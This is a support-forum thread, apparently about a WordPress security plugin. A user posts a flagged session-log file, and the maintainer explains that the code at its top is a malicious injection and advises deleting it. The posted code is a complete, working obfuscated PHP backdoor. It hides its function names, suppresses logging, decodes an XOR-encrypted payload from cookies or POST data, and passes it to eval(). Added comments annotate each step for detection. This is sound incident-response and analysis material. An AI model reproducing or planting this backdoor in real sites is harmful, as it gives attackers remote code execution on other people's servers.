October 31, 2018 at 8:14 am #2182
Scan found this location:
wp-content/plugins/gotmls/safe-load/_SESSION/.GOTMLS.69d73f2d111e766c58bafc8c8846db83.php
Had this code:
<?php
/*
 * NOTE(review): obfuscated PHP backdoor found prepended to the plugin's
 * per-login session-log file (the path is quoted in the forum post above).
 * Only the final `$GLOBALS["GOTMLS"]["logins"][...]` statement after the first
 * `?>` is the plugin's own content; everything before it was injected.
 * The curly quotes (“ ” ″) are forum rendering artifacts of plain double
 * quotes.  Annotated for analysis only — do not execute.
 */
$w9f53 = 265;$GLOBALS['vae0'] = Array();global $vae0;
/* $vae0 is an alias of $GLOBALS, so every $vae0[...] write below creates a global. */
$vae0 = $GLOBALS;
/* Character table.  `${"GLOBALS"}['m55bc753']` holds a string of ~98 escaped
 * characters; every function name used later is assembled by indexing into it,
 * so identifiers such as eval/unserialize/ini_set never appear as literals a
 * plain grep would catch. */
${“\x47\x4c\x4fB\x41\x4c\x53″}['m55bc753'] = “\x3d\x3e\x41\x22\x21\x3c\x7a\x5d\x63\x3b\x2e\x65\x4d\x72\x48\x69\x2a\x4c\x6f\x6a\x59\x73\x70\x47\x57\x36\x46\x24\x7d\x49\x32\xa\x56\x4e\x5c\x2c\x9\x43\x40\x4a\x27\x58\x4f\x35\x6b\x44\x31\x5e\x30\x5b\x51\x4b\x20\x6d\x34\x7e\x2d\x52\x71\x26\x7b\x6e\x5a\x37\x2f\x25\x60\xd\x78\x76\x66\x42\x50\x23\x29\x2b\x62\x28\x55\x38\x5f\x3f\x79\x61\x7c\x6c\x54\x45\x67\x74\x39\x77\x64\x3a\x53\x68\x75\x33″;
/* Assembled helper names stored under random-looking global keys, in order:
 * chr, ord, define, strlen, defined, ini_set, serialize, phpversion,
 * unserialize, base64_decode, set_time_limit, then the names of the two
 * functions declared further down, then copies of $_POST and $_COOKIE. */
$vae0[$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][8].$vae0['m55bc753'][97].$vae0['m55bc753'][76]] = $vae0['m55bc753'][8].$vae0['m55bc753'][95].$vae0['m55bc753'][13];$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]] = $vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][92];$vae0[$vae0['m55bc753'][58].$vae0['m55bc753'][76].$vae0['m55bc753'][25].$vae0['m55bc753'][43]] = $vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]] = $vae0['m55bc753'][21].$vae0['m55bc753'][89].$vae0['m55bc753'][13].$vae0['m55bc753'][85].$vae0['m55bc753'][11].$vae0['m55bc753'][61];$vae0[$vae0['m55bc753'][11].$vae0['m55bc753'][92].$vae0['m55bc753'][92].$vae0['m55bc753'][46]] = $vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][11].$vae0['m55bc753'][92];$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]] = 
$vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][15].$vae0['m55bc753'][80].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][89];$vae0[$vae0['m55bc753'][76].$vae0['m55bc753'][76].$vae0['m55bc753'][54].$vae0['m55bc753'][90].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][48]] = $vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][15].$vae0['m55bc753'][83].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][6].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][92].$vae0['m55bc753'][25].$vae0['m55bc753'][8].$vae0['m55bc753'][25]] = $vae0['m55bc753'][22].$vae0['m55bc753'][95].$vae0['m55bc753'][22].$vae0['m55bc753'][69].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][21].$vae0['m55bc753'][15].$vae0['m55bc753'][18].$vae0['m55bc753'][61];$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][8].$vae0['m55bc753'][92].$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][76]] = $vae0['m55bc753'][96].$vae0['m55bc753'][61].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][15].$vae0['m55bc753'][83].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][6].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][43]] = $vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][25].$vae0['m55bc753'][54].$vae0['m55bc753'][80].$vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][8].$vae0['m55bc753'][18].$vae0['m55bc753'][92].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][79].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][43].$vae0['m55bc753'][48].$vae0['m55bc753'][83]] = 
$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][89].$vae0['m55bc753'][80].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][11].$vae0['m55bc753'][80].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][15].$vae0['m55bc753'][89];$vae0[$vae0['m55bc753'][44].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11].$vae0['m55bc753'][92]] = $vae0['m55bc753'][88].$vae0['m55bc753'][43].$vae0['m55bc753'][92].$vae0['m55bc753'][90].$vae0['m55bc753'][76].$vae0['m55bc753'][97].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]] = $vae0['m55bc753'][68].$vae0['m55bc753'][83].$vae0['m55bc753'][90].$vae0['m55bc753'][79];
/* Request snapshots: the cookie and POST arrays are the backdoor's only input channel. */
$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][43].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][92]] = $_POST;$vae0[$vae0['m55bc753'][69].$vae0['m55bc753'][8].$vae0['m55bc753'][30].$vae0['m55bc753'][48].$vae0['m55bc753'][11].$vae0['m55bc753'][97].$vae0['m55bc753'][70]] = $_COOKIE;
/* Anti-forensics / anti-timeout prelude, all error-suppressed with `@`:
 * ini_set('error_log', NULL); ini_set('log_errors', 0);
 * ini_set('max_execution_time', 0); set_time_limit(0).
 * Detection hint: ini_set()/set_time_limit() reached through variable
 * function names is rare in legitimate plugin code. */
@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][13].$vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][80].$vae0['m55bc753'][85].$vae0['m55bc753'][18].$vae0['m55bc753'][88], NULL);@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][85].$vae0['m55bc753'][18].$vae0['m55bc753'][88].$vae0['m55bc753'][80].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][13].$vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][21], 
0);@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][53].$vae0['m55bc753'][83].$vae0['m55bc753'][68].$vae0['m55bc753'][80].$vae0['m55bc753'][11].$vae0['m55bc753'][68].$vae0['m55bc753'][11].$vae0['m55bc753'][8].$vae0['m55bc753'][96].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][18].$vae0['m55bc753'][61].$vae0['m55bc753'][80].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][11], 0);@$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][79].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][43].$vae0['m55bc753'][48].$vae0['m55bc753'][83]](0);
/* Run-once guard: defined()/define() on a long `ALREADY_RUN_<hex>` constant, so
 * a second include of this file in the same request does nothing. */
if (!$vae0[$vae0['m55bc753'][11].$vae0['m55bc753'][92].$vae0['m55bc753'][92].$vae0['m55bc753'][46]]($vae0['m55bc753'][2].$vae0['m55bc753'][17].$vae0['m55bc753'][57].$vae0['m55bc753'][87].$vae0['m55bc753'][2].$vae0['m55bc753'][45].$vae0['m55bc753'][20].$vae0['m55bc753'][80].$vae0['m55bc753'][57].$vae0['m55bc753'][78].$vae0['m55bc753'][33].$vae0['m55bc753'][80].$vae0['m55bc753'][97].$vae0['m55bc753'][25].$vae0['m55bc753'][25].$vae0['m55bc753'][83].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][97].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][76].$vae0['m55bc753'][30].$vae0['m55bc753'][46].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][46].$vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][46].$vae0['m55bc753'][83].$vae0['m55bc753'][48].$vae0['m55bc753'][30].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][83])){$vae0[$vae0['m55bc753'][58].$vae0['m55bc753'][76].$vae0['m55bc753'][25].$vae0['m55bc753'][43]]($vae0['m55bc753'][2].$vae0['m55bc753'][17].$vae0['m55bc753'][57].$vae0['m55bc753'][87]
.$vae0['m55bc753'][2].$vae0['m55bc753'][45].$vae0['m55bc753'][20].$vae0['m55bc753'][80].$vae0['m55bc753'][57].$vae0['m55bc753'][78].$vae0['m55bc753'][33].$vae0['m55bc753'][80].$vae0['m55bc753'][97].$vae0['m55bc753'][25].$vae0['m55bc753'][25].$vae0['m55bc753'][83].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][97].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][76].$vae0['m55bc753'][30].$vae0['m55bc753'][46].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][46].$vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][46].$vae0['m55bc753'][83].$vae0['m55bc753'][48].$vae0['m55bc753'][30].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][83], 1);$r613 = NULL;$a3f6d19 = NULL;
/* Hard-coded authentication secret (a UUID-shaped string).  Written into
 * $GLOBALS so that `global $cee1d45` below and g5d9b3e() can read it. */
$vae0[$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][11].$vae0['m55bc753'][46].$vae0['m55bc753'][92].$vae0['m55bc753'][54].$vae0['m55bc753'][43]] = $vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][97].$vae0['m55bc753'][30].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][56].$vae0['m55bc753'][92].$vae0['m55bc753'][97].$vae0['m55bc753'][48].$vae0['m55bc753'][70].$vae0['m55bc753'][56].$vae0['m55bc753'][54].$vae0['m55bc753'][76].$vae0['m55bc753'][8].$vae0['m55bc753'][54].$vae0['m55bc753'][56].$vae0['m55bc753'][90].$vae0['m55bc753'][76].$vae0['m55bc753'][8].$vae0['m55bc753'][90].$vae0['m55bc753'][56].$vae0['m55bc753'][63].$vae0['m55bc753'][70].$vae0['m55bc753'][8].$vae0['m55bc753'][25].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][30].$vae0['m55bc753'][83].$vae0['m55bc753'][63].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11];global $cee1d45;
/* xa98($data, $key): repeating-key XOR.  Walks $data byte by byte and XORs
 * each byte with the next byte of $key, cycling through $key; chr()/ord()/
 * strlen() are reached through their assembled names. */
function xa98($r613, $x2871b){global $vae0;$fa85fe5d = “”;for ($t2fa871b7=0; 
$t2fa871b7<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($r613);){for ($sd312=0; $sd312<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($x2871b) && $t2fa871b7<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($r613); $sd312++, $t2fa871b7++){$fa85fe5d .= $vae0[$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][8].$vae0['m55bc753'][97].$vae0['m55bc753'][76]]($vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]]($r613[$t2fa871b7]) ^ $vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]]($x2871b[$sd312]));}}return $fa85fe5d;}
/* g5d9b3e($data, $key): two-layer XOR — first with the hard-coded secret
 * ($cee1d45), then with the caller-supplied $key. */
function g5d9b3e($r613, $x2871b){global $vae0;global $cee1d45;return $vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]]($vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]]($r613, $cee1d45), $x2871b);}
/* Payload selection: the value of the LAST cookie wins; if that is empty the
 * LAST POST field is used instead.  Its parameter name is kept as the second
 * XOR key, so the request carries no fixed marker a WAF could match on. */
foreach ($vae0[$vae0['m55bc753'][69].$vae0['m55bc753'][8].$vae0['m55bc753'][30].$vae0['m55bc753'][48].$vae0['m55bc753'][11].$vae0['m55bc753'][97].$vae0['m55bc753'][70]] as $x2871b=>$kd935987e){$r613 = $kd935987e;$a3f6d19 = $x2871b;}if (!$r613){foreach 
($vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][43].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][92]] as $x2871b=>$kd935987e){$r613 = $kd935987e;$a3f6d19 = $x2871b;}}
/* base64_decode -> g5d9b3e (double XOR) -> unserialize, on attacker-controlled
 * input, with errors hidden by `@`.  unserialize() of untrusted data is a
 * deserialization risk in itself, independent of the eval() that follows. */
$r613 = @$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][8].$vae0['m55bc753'][92].$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][76]]($vae0[$vae0['m55bc753'][44].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11].$vae0['m55bc753'][92]]($vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][43]]($r613), $a3f6d19));
/* Authentication: the decoded array must carry the hard-coded secret
 * (compared with loose `==`).  Command dispatch follows: one branch echoes
 * serialize() of phpversion() plus a static version marker (a liveness /
 * fingerprint beacon); the other hands the supplied string to eval() —
 * unauthenticated-to-the-site remote code execution.  exit() afterwards so
 * the host page never renders and the request leaves no normal page output. */
if (isset($r613[$vae0['m55bc753'][83].$vae0['m55bc753'][44]]) && $cee1d45==$r613[$vae0['m55bc753'][83].$vae0['m55bc753'][44]]){if ($r613[$vae0['m55bc753'][83]] == $vae0['m55bc753'][15]){$t2fa871b7 = Array($vae0['m55bc753'][22].$vae0['m55bc753'][69] => @$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][92].$vae0['m55bc753'][25].$vae0['m55bc753'][8].$vae0['m55bc753'][25]](),$vae0['m55bc753'][21].$vae0['m55bc753'][69] => $vae0['m55bc753'][46].$vae0['m55bc753'][10].$vae0['m55bc753'][48].$vae0['m55bc753'][56].$vae0['m55bc753'][46],);echo @$vae0[$vae0['m55bc753'][76].$vae0['m55bc753'][76].$vae0['m55bc753'][54].$vae0['m55bc753'][90].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][48]]($t2fa871b7);}elseif ($r613[$vae0['m55bc753'][83]] == $vae0['m55bc753'][11]){
/* RCE sink.  The inline `/*g7d8cc*​/` comment splits `eval(` to defeat naive
 * signature matching; a scanner should tokenize rather than regex for it. */
eval/*g7d8cc*/($r613[$vae0['m55bc753'][92]]);}exit();}} ?><?php
/* The plugin's own one-line session-log entry (see the maintainer's reply
 * below): a base64-encoded serialized one-element array that appears to
 * record a request method and a timestamp string.  Benign on its own, but
 * note it also uses unserialize(base64_decode()), which is why the injection
 * prepended to it blends in on a casual read. */
$GLOBALS["GOTMLS"]["logins"]["69d73f2d111e766c58bafc8c8846db83"]=unserialize(base64_decode(“YToxOntzOjM6IkdFVCI7czoxNToiMTUzOTAyOTg2Ni42MDU3Ijt9″));
November 1, 2018 at 10:01 am #2183
That is supposed to be a simple session log for login attempts on your site. All that other code added to the beginning of the file is a malicious injection that was inserted into that file at some later time. You should definitely let my scanner fix that file, or you can delete the file completely.
November 2, 2018 at 5:37 am #2184
Is that a session code that expires? The majority of my issues are injection related…
November 2, 2018 at 9:58 am #2185
The small bit of serialized code that my plugin originally put in that file does have an expiration date built into it, but all that malicious code that was added to the top of that file has its own rules to live by, and it needs to be removed before it has a chance to replicate itself into other files. As with all malicious injections, it is important to remove the malicious code as quickly as possible before it can spread to more of the files on your server. Quick containment and isolation are the key to getting clean and staying safe from further infection and future re-infection.
Since all the files in that _SESSION folder are temporary and not critical to the core functionality of your site, you can delete the whole folder just to be safe. Any session files that are needed to validate future login attempts will be recreated by my plugin anyway, and those will all be clean (at least until you get hit by another wave of infections).